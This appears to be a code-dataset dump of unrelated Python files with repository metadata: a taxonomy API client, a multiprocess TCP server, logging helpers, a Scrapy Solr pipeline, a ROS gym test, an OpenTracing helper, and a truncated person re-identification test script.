"MIT"
] | 2 | 2020-06-01T11:26:18.000Z | 2020-11-11T03:31:30.000Z | import requests
import json
import pandas as pd
import re
from xml.etree import ElementTree
import warnings
class SP2000:
def __init__(self):
self.key = None
def set_search_key(self, key):
"""SP2000 API keys
Apply for the apiKey variable to be used by all search_* functions,
register for http://sp2000.org.cn/api/document and use an API key. This function allows users to set this key.
:param key: Value to set apiKey(i.e. your API key).
:return: None
"""
self.key = key
# checkAPI
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getFamiliesByFamilyName',
params={'familyName': 'Cyprinidae', 'apiKey': self.key,
'page': 1}).text)
assert data['code'] != 401, 'Please check your apiKey.'
def search_family_id(self, *queries, start=1, limit=20):
"""Search family IDs
Search family IDs via family name, supports Latin and Chinese names.
:param queries: Family name, or part of a family name; supports Latin and Chinese names. Single or more query.
:param start: integer Record number to start at. If omitted, the results are returned from the first record
(start=1). Use in combination with limit to page through results. Note that we do the paging internally for
you, but you can manually set the start parameter.
:param limit: integer Number of records to return. This is passed across all sources; when you first query,
set the limit to something smallish so that you can get a result quickly, then do more as needed.
:return:
"""
assert self.key, 'You need to apply for the apiKey from http://sp2000.org.cn/api/document'
fids = {}
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getFamiliesByFamilyName',
params={'familyName': query, 'apiKey': self.key,
'page': start + idx}).text)
for entry in data['data']['familes']:
fid_list.append(entry['record_id'])
fids[query] = fid_list
return fids
def search_taxon_id(self, *queries, name='scientificName', start = 1, limit = 20):
"""Search taxon IDs
Search taxon IDs via familyId, scientificName and commonName.
:param queries: familyId, scientificName or commonName. Single or more query.
:param name: name should be in ("familyId","scientificName","commonName"); the default value is "scientificName".
:param start: integer Record number to start at. If omitted, the results are returned from the first record
(start=1). Use in combination with limit to page through results. Note that we do the paging internally for
you, but you can manually set the start parameter.
:param limit: integer Number of records to return. This is passed across all sources; when you first query,
set the limit to something smallish so that you can get a result quickly, then do more as needed.
:return:
"""
assert self.key, ' You need to apply for the apiKey from http://sp2000.org.cn/api/document'
assert name in ['familyId', 'scientificName', 'commonName'],\
'name should be in ("familyId","scientificName","commonName"); the default value is "scientificName".'
taxon_id = {}
if name == 'familyId':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByFamilyId',
params={'familyId': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['namecode'])
taxon_id[query] = fid_list
elif name == 'scientificName':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByScientificName',
params={'scientificName': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['accepted_name_info']['namecode'])
taxon_id[query] = fid_list
elif name == 'commonName':
for query in queries:
page_num = limit // 20
fid_list = []
for idx in range(page_num):
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByCommonName',
params={'commonName': query, 'apiKey': self.key,
'page': start + idx}).text)
if data['data']['species'] is None:
continue
for entry in data['data']['species']:
fid_list.append(entry['accepted_name_info']['namecode'])
taxon_id[query] = fid_list
return taxon_id
def search_checklist(self, *queries):
"""Search Catalogue of Life China checklist
Get checklist via species or infraspecies ID.
:param queries: single or more query
:return:
"""
assert self.key, ' You need to apply for the apiKey from http://sp2000.org.cn/api/document'
checklist = {}
for taxon_id in queries:
data = json.loads(requests.get('http://www.sp2000.org.cn/api/v2/getSpeciesByNameCode',
params={'nameCode': taxon_id, 'apiKey': self.key}).text)['data']
if data is None:
continue
checklist[taxon_id] = data
return checklist
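# Usage sketch (illustrative; 'your-api-key' is a placeholder):
#   sp = SP2000()
#   sp.set_search_key('your-api-key')
#   ids = sp.search_taxon_id('Uncia uncia')
#   checklist = sp.search_checklist(*ids['Uncia uncia'])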
@staticmethod
def list_df(checklist):
"""Catalogue of Life China list(s) convert data frame(deprecated)
Checklist lists convert data frame.
:param checklist: return from search_checklist
:return:
"""
warnings.warn('this function is deprecated', DeprecationWarning)
return pd.DataFrame(checklist)
@staticmethod
def find_synonyms(*queries):
"""Find synonyms via species name
Find synonyms via species name from Catalogue of Life Global.
:param queries: species name.single or more query.
:return: set
"""
synonyms = {}
for query in queries:
synonyms_set = set()
query_no_space = re.sub(' ', '+', query)
data = json.loads(requests.get(
'http://webservice.catalogueoflife.org/col/webservice?name={}'
'&format=json&response=full'.format(query_no_space)).text)['results']
for entry in data:
if entry['name'] == query:
status = entry['name_status']
if status == 'synonym':
synonyms_set.add(entry['accepted_name']['name'])
elif status == 'accepted name':
for synonym in entry['synonyms']:
synonyms_set.add(synonym['name'])
synonyms[query] = synonyms_set
return synonyms
@staticmethod
def get_col_taiwan(*queries, level='species', option='equal', include_synonyms=True):
"""Search Catalogue of Life Taiwan checklist
Get Catalogue of Life Taiwan checklist via advanced query.
:param queries: The string to search for. single or more query
:param level: Query by category tree; level should be in ("kingdom","phylum","class","order","family","genus","species"); the default value is "species".
:param option: Query format; option should be in ("contain","equal","beginning"); the default value is "equal".
:param include_synonyms: Whether the results contain a synonym or not.
:return:
"""
assert level in ['kingdom', 'phylum', 'class', 'order', 'family', 'genus', 'species'],\
'level should be in ("kingdom","phylum","class","order","family","genus","species")'
assert option in ['contain', 'equal', 'beginning'],\
'option should be in ("contain","equal","beginning"); the default value is "equal".'
col_taiwan_dict = {}
for query in queries:
col_taiwan_list = []
if include_synonyms:
url = 'http://taibnet.sinica.edu.tw/eng/taibnet_xml.php?R1={tree}&D1=&' \
'D2={tree}&D3={option}&T1={query}+&T2=&id=y&sy=y'.format(tree=level, option=option, query=query)
else:
url = 'http://taibnet.sinica.edu.tw/eng/taibnet_xml.php?R1={tree}&D1=&' \
'D2={tree}&D3={option}&T1={query}+&T2=&id=y&sy='.format(tree=level, option=option, query=query)
x = requests.get(url).text
tree = ElementTree.fromstring(x)
for i in tree:
if i.tag == 'record':
col_dict = dict()
for element in i:
col_dict[element.tag] = element.text
col_taiwan_list.append(col_dict)
col_taiwan_dict[query] = col_taiwan_list
return col_taiwan_dict
@staticmethod
    def get_redlist_china(query='', option='Scientific Names', group='Amphibians'):
        """Query Redlist of Chinese Biodiversity
        Query the Redlist of China's Biodiversity of Vertebrates, Higher Plants and Macrofungi.
        :param query: string The string to query for.
        :param option: character Either "Chinese Names" or "Scientific Names".
            Give either a Chinese name or a scientific name; if a scientific name
            is given, the Chinese name may not be used. Only exact matches of the
            given name will be returned.
        :param group: character One of ("Amphibians", "Birds", "Inland Fishes",
            "Mammals", "Reptiles", "Plants", "Fungi").
        :return: pandas DataFrame
        """
        assert option in ['Chinese Names', 'Scientific Names'], \
            'option should be one of ("Chinese Names","Scientific Names"); the default value is "Scientific Names".'
        assert group in ["Amphibians", "Birds", "Inland Fishes", "Mammals", "Reptiles", "Plants", "Fungi", ""],\
            'group should be one of ("Amphibians","Birds","Inland Fishes","Mammals","Reptiles","Plants","Fungi","")'
try:
excel = pd.read_excel(open('RedlistChina.xlsx', 'rb'))
except FileNotFoundError:
data = requests.get('https://files.ynulhcloud.cn/RedlistChina.xlsx').content
with open('RedlistChina.xlsx', 'wb') as f:
f.write(data)
excel = pd.read_excel(open('RedlistChina.xlsx', 'rb'))
        # pick the column to match on: Chinese vs scientific names
        name_column = 'species_c' if option == 'Chinese Names' else 'species'
        if query:
            # na=False treats rows with a missing name as non-matches, which
            # replaces the original double notna()/contains indexing
            df = excel[excel[name_column].str.contains(query, regex=False, na=False)]
            if group:
                df = df[df['group'] == group]
        elif group:
            df = excel[excel['group'] == group]
        else:
            df = None
        return df
@staticmethod
    def get_col_global(*queries, option='name', response='terse', start=0, limit=500):
        """Search Catalogue of Life Global checklist
        Get Catalogue of Life Global checklist entries via species name or ID.
        :param queries: The string(s) to search for; single or multiple queries.
        :param option: Either "name" or "id". Give either a name or an ID; if an ID
            is given, the name parameter may not be used, and vice versa. Only exact
            matches of the given name will be returned. The default value is "name".
        :param response: Type of response returned, either "terse" or "full". If
            omitted, results are returned in the default terse format. "terse"
            returns a minimal set of fields (faster and smaller, enough for name
            lookup); "full" returns all available information.
        :param start: The first record to return. If omitted, results are returned
            from the first record (start=0). Useful when the total number of results
            exceeds the maximum returned by a single web service query (currently
            500 for terse queries and 50 for full queries). The default value is 0.
        :param limit: integer Number of records to return, default 500. Note that
            there is a hard maximum of 10,000, calculated as limit + start, so
            start=9,000 with limit=2,000 won't work.
        :return:
        """
        assert option in ['name', 'id'], 'option should be one of ("name", "id").'
        assert response in ['terse', 'full'], 'response should be one of ("terse", "full").'
result_dict = {}
        for query in queries:
            if option == 'name':
                query_no_space = re.sub(' ', '+', query)
                url = ('http://webservice.catalogueoflife.org/col/webservice?name={}'
                       '&format=json&response={}&start={}'.format(query_no_space, response, start))
            else:
                url = ('http://webservice.catalogueoflife.org/col/webservice?id={}'
                       '&format=json&response={}&start={}'.format(query, response, start))
            # guard against a missing 'results' key before slicing; the original
            # sliced only in the id branch and crashed when results was None
            results = json.loads(requests.get(url).text).get('results') or []
            result_dict[query] = results[:limit]
        return result_dict
sp2000 = SP2000()
set_search_key = sp2000.set_search_key
search_family_id = sp2000.search_family_id
search_taxon_id = sp2000.search_taxon_id
search_checklist = sp2000.search_checklist
list_df = sp2000.list_df
find_synonyms = sp2000.find_synonyms
get_col_taiwan = sp2000.get_col_taiwan
get_redlist_china = sp2000.get_redlist_china
get_col_global = sp2000.get_col_global
if __name__ == '__main__':
from pprint import pprint
api_key = 'null'
sp2000.set_search_key(api_key)
# print(sp2000.search_taxon_id('1233542354', stype='family_id'))
# print(sp2000.search_taxon_id('Uncia uncia', stype='scientific_name'))
# print(sp2000.search_taxon_id('Uncia uncia', 'Anguilla marmorata', stype='scientific_name'))
# print(sp2000.search_checklist('b8c6a086-3d28-4876-8e8a-ca96e667768d'))
# print(sp2000.find_synonyms('Anguilla anguilla'))
# print(sp2000.get_col_taiwan("Anguilla marmorata","Anguilla japonica","Anguilla bicolor","Anguilla nebulosa", "Anguilla luzonensis", tree="name", option="contain"))
# print(sp2000.search_taxon_id('bf72e220caf04592a68c025fc5c2bfb7', stype='family_id'))
#
# r = sp2000.get_col_taiwan(query="Anguilla",tree="name",option = "contain")
# pprint(sp2000.search_checklist('b8c6a086-3d28-4876-8e8a-ca96e667768d'))
# print(len(sp2000.get_col_global("Platalea leucorodia", option="name")['Platalea leucorodia']))
# print(sp2000.get_col_taiwan("Anguilla", "Anguilla"))
# print(sp2000.get_col_global("Anguilla marmorata","Anguilla japonica",
# "Anguilla bicolor","Anguilla nebulosa","Anguilla luzonensis",option="name"))
# print(sp2000.search_taxon_id('Actinidia arg', name = 'scientific_name'))
# print(sp2000.search_checklist('123', 'T20171000100267', '123124'))
    # print(sp2000.get_redlist_china(query='Anguilla', option="Scientific Names", group='Inland Fishes'))
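    # Editor-added usage sketch, kept commented like the examples above since
    # it needs a valid apiKey and network access: chain a taxon-id lookup into
    # a checklist fetch (search_taxon_id maps each query to a list of IDs).
    #   ids = sp2000.search_taxon_id('Uncia uncia', stype='scientific_name')
    #   for taxon_ids in ids.values():
    #       pprint(sp2000.search_checklist(*taxon_ids))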
| 51.491071 | 169 | 0.598405 | 2,072 | 17,301 | 4.915058 | 0.16361 | 0.010998 | 0.010801 | 0.013747 | 0.556952 | 0.488511 | 0.440691 | 0.417027 | 0.375786 | 0.353594 | 0 | 0.0262 | 0.291833 | 17,301 | 335 | 170 | 51.644776 | 0.805011 | 0.366279 | 0 | 0.331606 | 0 | 0.015544 | 0.23897 | 0.039261 | 0 | 0 | 0 | 0 | 0.056995 | 1 | 0.051813 | false | 0 | 0.036269 | 0 | 0.134715 | 0.005181 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1303ad9297d22de2971122e8b251bda9017b249 | 2,544 | py | Python | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 7 | 2018-03-06T11:06:00.000Z | 2022-03-31T09:24:49.000Z | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 1 | 2022-03-31T09:24:39.000Z | 2022-03-31T09:24:39.000Z | aio_tcpserver/serve_multiple.py | Basic-Components/aio-tcpserver | 39e90a9e77262640d548fdd15e6f80649f872400 | [
"MIT"
] | 3 | 2019-12-11T07:12:20.000Z | 2021-08-13T04:15:38.000Z | """多进程执行tcp服务.
签名为:multiple_tcp_serve(server_settings: dict, workers: int)->None
"""
import os
import time
from multiprocessing import Process
from typing import Dict, Any
from socket import (
socket,
SOL_SOCKET,
SO_REUSEADDR
)
from signal import (
SIGTERM, SIGINT,
signal as signal_func,
Signals
)
from .errors import MultipleProcessDone
from .server_single import tcp_serve
from .log import server_logger as logger
def multiple_tcp_serve(server_settings: Dict[str, Any], workers: int) -> None:
    """Start a multi-process TCP service whose workers share one socket object.
    Runs the TCP service inside every child process (multiple mode) and
    reclaims all resources in one place once execution finishes.
    Params:
        server_settings (Dict[str, Any]): settings for each single process
        workers (int): number of worker processes to run
    """
server_settings['reuse_port'] = True
server_settings['run_multiple'] = True
# Handling when custom socket is not provided.
if server_settings.get('sock') is None:
sock = socket()
sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
sock.bind((server_settings['host'], server_settings['port']))
sock.set_inheritable(True)
server_settings['sock'] = sock
server_settings['host'] = None
server_settings['port'] = None
    def sig_handler(signal: Any, frame: Any):
        """Forward SIGTERM to the children to stop the event loop running in each of them.
        Params:
            signal (Any): the signal being handled
            frame (Any): the current stack frame
        """
        status = []
        for process in processes:
            alive = process.is_alive()
            status.append(alive)
            if alive:
                os.kill(process.pid, SIGTERM)
if any(status):
logger.info(
"""Received signal {}. Shutting down. You may need to enter Ctrl+C again.
""".format(Signals(signal).name))
else:
raise MultipleProcessDone("all process not alive")
signal_func(SIGINT, sig_handler)
signal_func(SIGTERM, sig_handler)
processes = []
for _ in range(workers):
process = Process(target=tcp_serve, kwargs=server_settings)
process.daemon = True
process.start()
processes.append(process)
    try:
        while True:
            # sleep instead of busy-spinning; an incoming signal interrupts
            # the sleep and MultipleProcessDone propagates out of the loop
            time.sleep(1)
    except MultipleProcessDone as done:
        logger.info(str(done))
finally:
for process in processes:
process.join()
        # after join() has synchronized, terminate children only once they have finished running
for process in processes:
process.terminate()
server_settings.get('sock').close()
logger.info("Shutting down done.")
| 26.5 | 89 | 0.621462 | 277 | 2,544 | 5.577617 | 0.407942 | 0.117799 | 0.023301 | 0.040777 | 0.080259 | 0.044013 | 0 | 0 | 0 | 0 | 0 | 0.000547 | 0.281053 | 2,544 | 95 | 90 | 26.778947 | 0.844177 | 0.16195 | 0 | 0.04918 | 0 | 0 | 0.045802 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0.016393 | 0.131148 | 0 | 0.163934 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1333d943699da4c1ce17cde48edc0e62fcebc8d | 1,565 | py | Python | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | 6 | 2019-06-06T15:15:56.000Z | 2020-11-23T19:55:37.000Z | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | 149 | 2020-11-22T15:53:34.000Z | 2022-03-24T23:17:42.000Z | bin/utils/logs.py | IshanManchanda/DeepFryBot | bb83c8bc0c92ab1d984ead385940270dd73a3658 | [
"MIT"
] | null | null | null | from datetime import datetime
from inspect import currentframe, getframeinfo
from sys import stdout
from pytz import timezone
def log_debug(message):
    cf = currentframe()
    # use the caller's frame (f_back); getframeinfo(cf) would always report
    # this module's own filename instead of the call site
    file = getframeinfo(cf.f_back).filename
    line = cf.f_back.f_lineno
    timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
    stdout.write(f'DEBUG {timestamp} <line {line}, {file}>: {message}\n')
def log_info(message):
timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
stdout.write(f'INFO {timestamp}: {message}\n')
def log_warn(message):
    cf = currentframe()
    file = getframeinfo(cf.f_back).filename
    line = cf.f_back.f_lineno
    timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
    stdout.write(f'WARN {timestamp} <line {line}, {file}>: {message}\n')
def log_error(message):
    cf = currentframe()
    file = getframeinfo(cf.f_back).filename
    line = cf.f_back.f_lineno
    timestamp = datetime.now(tz=timezone('Asia/Kolkata'))
    # was mistakenly labelled WARN (copy-paste from log_warn)
    stdout.write(f'ERROR {timestamp} <line {line}, {file}>: {message}\n')
def log_command(update, command):
log_info(f'{{{command}}} {{{generate_log_message(update)}}}')
def log_message(update):
log_info(generate_log_message(update))
def generate_log_message(update):
return (
'(%s[%s]) %s[%s]: %s' % (
update.message.chat.title,
update.message.chat.id,
update.message.from_user.first_name,
update.message.from_user.id,
update.message.text if update.message.text else '<media file>'
)
if update.message.chat.type != 'private' else
'%s[%s]: %s' % (
update.message.from_user.first_name,
update.message.from_user.id,
update.message.text
)
)
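if __name__ == '__main__':
    # Editor-added smoke test, not part of the original file: exercise the
    # plain loggers. log_command/log_message need a Telegram `update` object,
    # so they are not covered here.
    log_info('bot started')
    log_warn('rate limit approaching')
    log_error('failed to process request')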
| 24.453125 | 70 | 0.711821 | 221 | 1,565 | 4.923077 | 0.217195 | 0.119485 | 0.073529 | 0.080882 | 0.673713 | 0.606618 | 0.606618 | 0.606618 | 0.574449 | 0.574449 | 0 | 0 | 0.127796 | 1,565 | 63 | 71 | 24.84127 | 0.79707 | 0 | 0 | 0.422222 | 0 | 0 | 0.208946 | 0.021725 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155556 | false | 0 | 0.088889 | 0.022222 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d133b45aeed98c9fea851ca7c3a5dde3e6421e29 | 3,447 | py | Python | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 12 | 2017-09-17T02:14:35.000Z | 2022-01-09T10:14:59.000Z | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 92 | 2017-09-16T23:50:45.000Z | 2018-01-02T01:56:33.000Z | sleuth_crawler/scraper/scraper/pipelines.py | ubclaunchpad/sleuth | 7b7be0b7097a26169e17037f4220fd0ce039bde1 | [
"MIT"
] | 5 | 2017-12-26T01:47:36.000Z | 2021-12-31T11:15:07.000Z | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import json, time, datetime
from sleuth_backend.views.views import SOLR
from sleuth_backend.solr.models import *
from sleuth_crawler.scraper.scraper.items import *
class SolrPipeline(object):
"""
Process item and store in Solr
"""
def __init__(self, solr_connection=SOLR):
self.solr_connection = solr_connection
def close_spider(self, spider=None):
'''
Defragment Solr database after spider completes task
'''
print("Closing scraper: Emptying all queued documents")
self.solr_connection.insert_queued()
print("Closing scraper: Optimizing all cores")
self.solr_connection.optimize()
def process_item(self, item, spider=None):
'''
Match item type to predefined Schemas
https://github.com/ubclaunchpad/sleuth/wiki/Schemas
'''
if isinstance(item, ScrapyGenericPage):
self.__process_generic_page(item)
elif isinstance(item, ScrapyCourseItem):
self.__process_course_item(item)
elif isinstance(item, ScrapyRedditPost):
self.__process_reddit_post(item)
return item
def __process_generic_page(self, item):
'''
Convert Scrapy item to Solr GenericPage and commit it to database
Schema specified by sleuth_backend.solr.models.GenericPage
'''
solr_doc = GenericPage(
id=item["url"],
type="genericPage",
name=item["title"],
siteName=item["site_title"],
updatedAt=self.__make_date(),
content=self.__parse_content(item["raw_content"]),
description=item["description"],
links=item["links"]
)
solr_doc.save_to_solr(self.solr_connection)
def __process_course_item(self, item):
'''
Convert Scrapy item to Solr CourseItem and commit it to database
'''
subject = item['subject']
solr_doc = CourseItem(
id=item['url'],
type='courseItem',
name=item['name'],
updatedAt=self.__make_date(),
description=item['description'],
subjectId=subject['url'],
subjectName=subject['name'],
faculty=subject['faculty']
)
solr_doc.save_to_solr(self.solr_connection)
def __process_reddit_post(self, item):
'''
        Convert Scrapy item to Solr RedditPost and commit it to database
'''
solr_doc = RedditPost(
id=item['url'],
type='redditPost',
name=item['title'],
updatedAt=self.__make_date(),
description=item['post_content'],
comments=item['comments'],
links=item['links'],
)
solr_doc.save_to_solr(self.solr_connection)
    def __make_date(self):
        """
        Make a UTC date string in format 'Y-m-d H:M:S'
        """
        stamp = time.time()
        style = '%Y-%m-%d %H:%M:%S'
        # utcfromtimestamp matches the UTC promise in the docstring;
        # fromtimestamp would return local time
        return datetime.datetime.utcfromtimestamp(stamp).strftime(style)
def __parse_content(self, raw_content):
"""
Parse content list into single string
TODO: make smarter
"""
data = ' '.join(raw_content)
return data
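# Editor's note: a minimal settings.py sketch showing how this pipeline would
# be registered, per the ITEM_PIPELINES reminder at the top of the file; the
# dotted path mirrors the package layout implied by the imports above.
#   ITEM_PIPELINES = {
#       'sleuth_crawler.scraper.scraper.pipelines.SolrPipeline': 300,
#   }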
| 32.518868 | 73 | 0.604584 | 384 | 3,447 | 5.221354 | 0.359375 | 0.05586 | 0.062843 | 0.04389 | 0.212968 | 0.166085 | 0.12419 | 0.077805 | 0.077805 | 0.077805 | 0 | 0.000408 | 0.288657 | 3,447 | 105 | 74 | 32.828571 | 0.817292 | 0.206847 | 0 | 0.126984 | 0 | 0 | 0.098458 | 0 | 0 | 0 | 0 | 0.009524 | 0 | 1 | 0.126984 | false | 0 | 0.063492 | 0 | 0.253968 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d135b2968e3ad54042aa337d0eae95a9b9ac92e7 | 901 | py | Python | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | openai_ros/src/test_gym_env.py | suresh-guttikonda/openai-rosbot-env | e34a5843c8218ae733ee4e0d3ccecdf13ccafd87 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import sys
def set_path(path: str):
try:
sys.path.index(path)
except ValueError:
sys.path.insert(0, path)
# set the path to the 'openai_ros' directory programmatically (alternatively, set PYTHONPATH)
set_path('/media/suresh/research/awesome-robotics/active-slam/catkin_ws/src/openai-rosbot-env/openai_ros/src')
from openai_ros.task_envs.turtlebot3 import turtlebot3_world
import gym
import rospy
import numpy as np
if __name__ == '__main__':
# create a new ros node
rospy.init_node('turtlebot3_world')
# create a new gym environment
env = gym.make('TurtleBot3World-v0')
observation = env.reset()
for i in range(10):
        action = np.random.randint(0, 2)  # random discrete action: 0 or 1
print(action)
env.step(action)
env.close()
    # prevent the code from exiting until a shutdown signal (ctrl+c) is received
rospy.spin()
| 24.351351 | 110 | 0.697003 | 130 | 901 | 4.692308 | 0.653846 | 0.044262 | 0.032787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015278 | 0.200888 | 901 | 36 | 111 | 25.027778 | 0.831944 | 0.267481 | 0 | 0 | 0 | 0.047619 | 0.21374 | 0.149618 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.238095 | 0 | 0.285714 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13732d92b7461da43a38631ed1c6e40b76477f6 | 1,927 | py | Python | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | bentoml/tracing/opentrace.py | Shumpei-Kikuta/BentoML | 4fe508934ab431ea5c414ee9d8b84c2104688381 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from contextlib import contextmanager
from contextvars import ContextVar
from functools import partial
span_context_var = ContextVar('span context', default=None)
def initialize_tracer(service_name):
# pylint: disable=E0401
from jaeger_client.config import Config
from opentracing.scope_managers.asyncio import AsyncioScopeManager
# pylint: enable=E0401
config = Config(
config={'sampler': {'type': 'const', 'param': 1}},
service_name=service_name,
validate=True,
scope_manager=AsyncioScopeManager(),
)
return config.initialize_tracer()
@contextmanager
def trace(
server_url=None, # @UnusedVariable
request_headers=None,
async_transport=False, # @UnusedVariable
sample_rate=1.0, # @UnusedVariable
standalone=False, # @UnusedVariable
is_root=False, # @UnusedVariable
service_name="some service",
span_name="service procedure",
port=0, # @UnusedVariable
):
"""
Opentracing tracer function
"""
del server_url, async_transport, sample_rate, standalone, is_root, port
# pylint: disable=E0401
import opentracing
from opentracing import Format
# pylint: enable=E0401
tracer = initialize_tracer(service_name) or opentracing.global_tracer() or None
if tracer is None:
yield
return
span_context = None
span_context_saved = span_context_var.get()
if request_headers is not None:
span_context = tracer.extract(Format.HTTP_HEADERS, request_headers)
if span_context is None:
span_context = span_context_saved or None
    with tracer.start_active_span(
        operation_name=span_name, child_of=span_context
    ) as scope:
        token = span_context_var.set(scope.span.context)
        try:
            yield scope
        finally:
            # restore the previous span context even if the caller raises
            span_context_var.reset(token)
async_trace = partial(trace, async_transport=True)
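if __name__ == '__main__':
    # Editor-added usage sketch: wrap a unit of work in a traced span. It
    # assumes a Jaeger agent is reachable with default settings; without one,
    # the reported span is simply dropped.
    with trace(service_name='demo-service', span_name='demo span') as scope:
        print('inside span:', scope)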
| 25.693333 | 83 | 0.704203 | 225 | 1,927 | 5.813333 | 0.377778 | 0.109327 | 0.042813 | 0.041284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013816 | 0.211209 | 1,927 | 74 | 84 | 26.040541 | 0.846711 | 0.128697 | 0 | 0 | 0 | 0 | 0.03753 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.152174 | 0 | 0.23913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d13b98d360b55349ec9935550adb0e927f70dabb | 6,140 | py | Python | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | 1 | 2022-03-14T10:58:32.000Z | 2022-03-14T10:58:32.000Z | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | 1 | 2021-11-10T04:19:40.000Z | 2021-11-15T13:56:41.000Z | tools/test_on_one_img.py | Ehsan-Yaghoubi/You-Look-So-Different-Haven-t-I-Seen-You-a-Long-Time-Ago | 40cf189dd81f1b6048befadd1de895d8494c4635 | [
"MIT"
] | null | null | null | import os
import sys
import torch
import numpy as np
sys.path.append('.')
from config import cfg
from data.transforms import build_transforms
from modeling.baseline import Baseline
from PIL import Image
import argparse
def load_image(image_name):
image = Image.open(image_name)
val_transforms = build_transforms(cfg, is_train=False)
image = val_transforms(image)
image = image.unsqueeze(0)
return image
def load_trained_model(cfg, checkpoint_path):
num_classes = 10
